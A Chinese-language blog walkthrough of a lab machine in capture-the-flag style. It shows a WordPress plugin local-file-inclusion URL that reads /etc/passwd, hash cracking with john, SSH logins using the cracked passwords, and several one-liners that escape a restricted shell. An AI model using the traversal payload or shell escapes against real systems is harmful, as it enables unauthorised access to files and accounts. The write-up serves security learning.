• jQuery火箭图标返回顶部代码


    一、信息收集

      直接netdiscover,找到IP是 192.168.56.101 然后端口扫描一波 只打开了22和80端口,访问一下80端口,是apache首页,那就继续查目录赛.,发现了一个tsweb,应该是wordpress的

    打开是wp5.3的

    然后扫描全部 插件,发现 gracemedia-media-player 1.0 ,在exploit-db中搜索发现存在本地文件包含漏洞 急吧用没得

     

     得到POC

    /wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

    是可以读取到本地文件的,这边看到有md5值,后面就难得做了 CNMD!  受不了了还是做吧

    这儿得到2个账号 flag和rohit,而且可以知道flag账户是rbash,rohit是直接/bin/bash,不要问我怎么看出来的,,,拿到mds值就去解密啊 首先将md5值新建到一个文件中命名为hash,

     然后使用john 来破解

    john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long hash
    john --show --format=md5crypt-long hash

     这是时候我们就得到了一个账号 flag 密码 topsecret ssh连接呗

    ssh flag@192.168.56.101

    连接过后,发现有是rbash,受限制的shell   比如CD命令不行,

     后面经过测试,发现python 可以执行,我们直接用python来写入bash, 成功绕过    

    python -c 'import os; os.system("/bin/bash")'
    以下都是可以绕过的
    ssh username@IP -t "bash --noprofile"

    perl -e 'exec "/bin/sh";'
    awk 'BEGIN {system("/bin/bash")}'

     

     后面找了很久找到了在/var/backups/passbkp 目录下找到了另一个账号的hash,,采取同样的方式破解

     得到账号是

    账号:rohit
    密码:!%hack41

    成功切换到 rohit账户,(我直接su rohit 输入密码 !的时候自动换行导致密码错误,只好重新ssh连接)

     成功得到我们第一个flag

     切换到root账户拿到第二个flag

  • 相关阅读:
    redis 数据迁移
    redis
    Redis集群的三种模式
    Golang 协程 (goroutine) 与通道 (channel)
    Python生成器next方法和send方法区别
    python 文件
    Tornado 异步以及非阻塞的I/O
    python 多进程和多线程3 —— asyncio
    利用CSS改变图片颜色的100种方法!
    jquery获取div的位置
  • 原文地址:https://www.cnblogs.com/kuaile1314/p/12132730.html
Copyright © 2020-2023  润新知